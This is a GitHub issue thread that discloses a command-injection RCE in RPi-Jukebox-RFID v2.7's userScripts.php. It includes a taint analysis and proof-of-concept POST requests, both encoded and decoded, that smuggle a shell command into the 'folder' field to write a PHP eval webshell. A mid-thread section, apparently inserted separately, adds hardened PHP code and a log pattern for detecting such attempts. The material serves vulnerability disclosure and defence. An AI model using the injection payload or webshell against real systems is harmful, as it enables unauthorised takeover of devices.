🐛 | RPi-Jukebox-RFID V2.7_RCE_4 #2399

Open
xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage

Comments

@xjzzzxx

xjzzzxx commented Jul 11, 2024

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\userScripts.php

$post['filename'] = $_POST['filename'];  //Line 46 (Source)
if($_POST['ACTION'] == "userScript") {	// Line 62 (Check point)
    $messageAction.="Executed'sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew']."'";    // Line 64 (Tainted)
    $exec="sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew'];	// Line 67 (Tainted)
    exec($exec);	// Line 68 (Sink)
}

Source: Line 46 ($_POST['filename']).

Then there is a check point (Line 62), which we bypass by setting $_POST['ACTION'] = userScript.

After bypassing the check point, the tainted source is passed to $exec and to exec($exec); (Line 68) without another check.

Poc

POST /htdocs/userScripts.php

Data:

ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22

Here is the version without URL encoding for ease of understanding:

ACTION=userScript&folder=hello ; echo "<?php @eval($_POST['pass']) ?>" > ./shell4.php ;&folderNew=echo "hello"

Manual verification

(screenshots of the manual verification; not recoverable from the page)

The attacker can then easily connect to this webshell (/htdocs/shell4.php).

Logs

No response

Configuration

No response

More info

No response

@xjzzzxx xjzzzxx added bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage labels Jul 11, 2024
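The defect reported above is a shell command built by string concatenation from request fields and handed straight to exec(). The following is an added example of a hardened handler, written for this issue and not code from the RPi-Jukebox-RFID project; it assumes, as the quoted snippet does, that $conf['scripts_abs'] points at the scripts directory containing userscripts/, and it takes a single script name from the "folder" field (the function names and the "Invalid script name" message are this example's own). The fix combines three independent controls: a strict character allowlist on the name, a realpath() containment check against the userscripts directory, and escapeshellarg() on the one argument that still reaches the shell.

```php
<?php
// Added example (not the project's own code): hardened form of the
// "userScript" action from htdocs/userScripts.php.
// Assumptions (not from the page): $conf['scripts_abs'] is the scripts
// directory that contains userscripts/, and the POST field "folder"
// names one script inside it. Function names here are illustrative.

declare(strict_types=1);

function resolve_user_script(string $scriptsAbs, string $requested): ?string
{
    // 1. Allowlist the characters of the requested name. Shell
    //    metacharacters (";", "|", "$", quotes, spaces) and path
    //    separators never pass this check.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. Resolve both the base directory and the candidate and require
    //    the candidate to stay inside userscripts/. This also rejects
    //    "." and ".." and symlinks that point outside the directory.
    $base = realpath($scriptsAbs . '/userscripts');
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . '/' . $requested);
    if ($candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($candidate)
        || !is_executable($candidate)) {
        return null;
    }
    return $candidate;
}

function run_user_script(array $conf, array $post): string
{
    if (($post['ACTION'] ?? '') !== 'userScript') {
        return 'No action';
    }

    $script = resolve_user_script($conf['scripts_abs'], (string)($post['folder'] ?? ''));
    if ($script === null) {
        // Log the rejection server-side; never echo the attacker-controlled
        // value back into the page.
        error_log('userScripts: rejected script name');
        return 'Invalid script name';
    }

    // 3. Even with an allowlisted, contained path, quote the argument so
    //    the shell sees exactly one word. sudo is kept because the
    //    original code used it; the matching sudoers rule should be
    //    limited to scripts in this directory rather than a blanket NOPASSWD.
    $cmd = 'sudo ' . escapeshellarg($script);
    exec($cmd, $output, $status);
    return sprintf('Executed %s (exit %d)', basename($script), $status);
}

// Usage with constructed input shaped like the request in the report:
// the injected name fails the allowlist and nothing is executed.
echo run_user_script(
    ['scripts_abs' => '/home/pi/RPi-Jukebox-RFID/scripts'],   // assumed path
    ['ACTION' => 'userScript', 'folder' => 'hello ; echo "x" > ./shell.php ;']
), PHP_EOL;
```

The allowlist alone would already stop the reported payload, but the realpath() containment and escapeshellarg() are kept so that a future loosening of the regex (for example to allow subdirectories) does not silently reopen the injection. For detection, a web server log entry for userScripts.php whose POST body contains ";", "|", "$(" or "<?php" in the folder fields is a reliable indicator of this exploit attempt.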
@xjzzzxx
Author

xjzzzxx commented Jul 12, 2024

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

POST /htdocs/userScripts.php

Data

ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell4%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22

Here is the data without URL encoding for ease of understanding:

ACTION=userScript&folder=hello ; echo "<?php @eval(\$_POST['shell4']) ?>" > ./shell4.php ;&folderNew=echo "hello"

Manual verification

(screenshots of the manual verification; not recoverable from the page)
